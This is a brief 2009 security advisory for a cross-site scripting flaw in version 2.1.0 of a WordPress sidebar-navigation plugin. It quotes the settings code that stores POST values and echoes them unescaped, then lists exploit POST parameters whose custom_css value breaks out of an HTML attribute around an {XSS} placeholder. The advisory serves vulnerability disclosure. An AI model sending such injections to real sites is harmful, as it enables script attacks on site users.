WordPress Plugin <simple-sidebar-navigation 2.1.0> aXSS Vuln
(c)eLwaux 30.06.2009, uasc.org.ua
## ## ## ## ## ##
aXSS
/simple-sidebar-navigation/settings/settings.php
-----------------------------------------------------------------------------
10: if (isset($_POST['ssn_submit'])):
11: update_option('dropdown_css', $_POST['dropdown_css']);
12: update_option('custom_css', $_POST['custom_css']);
13: update_option('blog_post_links', $_POST['blog_post_links']);
14: update_option('target_attr', $_POST['target_attr']);
...
57: <td><input type="text" name="custom_css" size="100" value="<?php echo $custom_css; ?>">
-----------------------------------------------------------------------------
exploit:
POST: ssn_submit = .
POST: dropdown_css = .
POST: custom_css = ">{XSS}<div id="
POST: blog_post_links = .
POST: target_attr = .